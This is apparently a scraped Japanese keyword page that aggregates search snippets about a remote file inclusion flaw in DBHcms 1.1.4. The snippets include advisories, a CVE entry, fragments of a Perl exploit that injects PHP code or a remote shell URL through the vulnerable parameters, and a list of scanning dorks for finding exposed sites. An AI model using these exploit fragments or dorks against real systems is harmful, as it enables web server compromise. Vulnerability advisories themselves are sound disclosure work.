dbhcms/mod/mod.extmanager.php + dbhcms/mod/mod.extmanager.phpとは

dbhcms/mod/mod.extmanager.php(1～4件目 / 約4件)

#!/usr/bin/perl # DBHcms <= 1.1.4 Remote File Inclusion exploit ...
"dbhcms/mod/mod.extmanager.php?do=".$code; $ua = LWP::UserAgent->new; $ ua->timeout(10); $ua->env_proxy; $response = $ua->post($target, { ' extmanager_install' => $shell_url.'?' }); if ($response->is_success) { print "\n"."#" x 20 .
SANS: @RISK: The Consensus Security Vulnerability Alert
28 Feb 2008 ... The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input to the "do" parameter of the "dbhcms/mod/ mod.extmanager.php" script. DrBenHur.com DBHcms versions 1.1.4 ...
MaPhia Black: BUG DORK
23 Okt 2010 ... .scan dbhcms/mod/mod.extmanager.php?do= “DBHcms” .scan template/Bleu/ index.php?site_path= Bleu .scan /modules/My_eGallery/public/displayCategory. php?basepath= allinurl:modules.php?name=my_egallery ...
DR.BENHUR - Application Development - News
... by malicious people to disclose sensitive information or to compromise a vulnerable system. Input passed to the "extmanager_install" parameter in dbhcms/mod/mod.extmanager.php is not properly verified before being used to include files.

dbhcms/mod/mod.extmanager.phpとは(1～5件目 / 約10件)

DrBenHur.com DBHcms 'mod.extmanager.php' Remote File Include ...
Bugtraq ID: 27996. Class: Input Validation Error. CVE: Remote: Yes. Local: No. Published: Feb 25 2008 12:00AM. Updated: Feb 26 2008 09:02PM. Credit: Iron is credited with the discovery of this vulnerability. Vulnerable: DrBenHur.com ...
#!/usr/bin/perl # DBHcms <= 1.1.4 Remote File Inclusion exploit ...
{ $target .= "/"; } print "PHP code to evaluate? "; chomp($code=<stdin>); $code =~ s/(<\?php|\?>|<\?)//ig; $target .= "dbhcms/mod/mod.extmanager.php?do=".$code; $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; $response ...
SecurityFocus Newsletter #442
27 Feb 2008 ... DrBenHur.com DBHcms 'mod.extmanager.php' Remote File Include Vulnerability 52. SurgeFTP 'Content-Length' Parameter NULL Pointer Denial Of Service Vulnerability 53. SurgeMail Real CGI executables Remote Buffer ...
CVE-2008-1038 - National Vulnerability Database Home - NIST
27 Feb 2008 ... Overview. PHP remote file inclusion vulnerability in mod/mod.extmanager.php in DBHcms 1.1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the extmanager_install parameter.
SANS: @RISK: The Consensus Security Vulnerability Alert
28 Feb 2008 ... Course info at http://www.sans.org/sans2008/description.php?tid=1937 Get the discount code from Mason Brown .... Unspecified HTML Injection; 08.09.91 - DrBenHur.com DBHcms "mod.extmanager.php" Remote File Include ...

Posted on 2009年 07月 24日

m.sfa-cms.org | Contact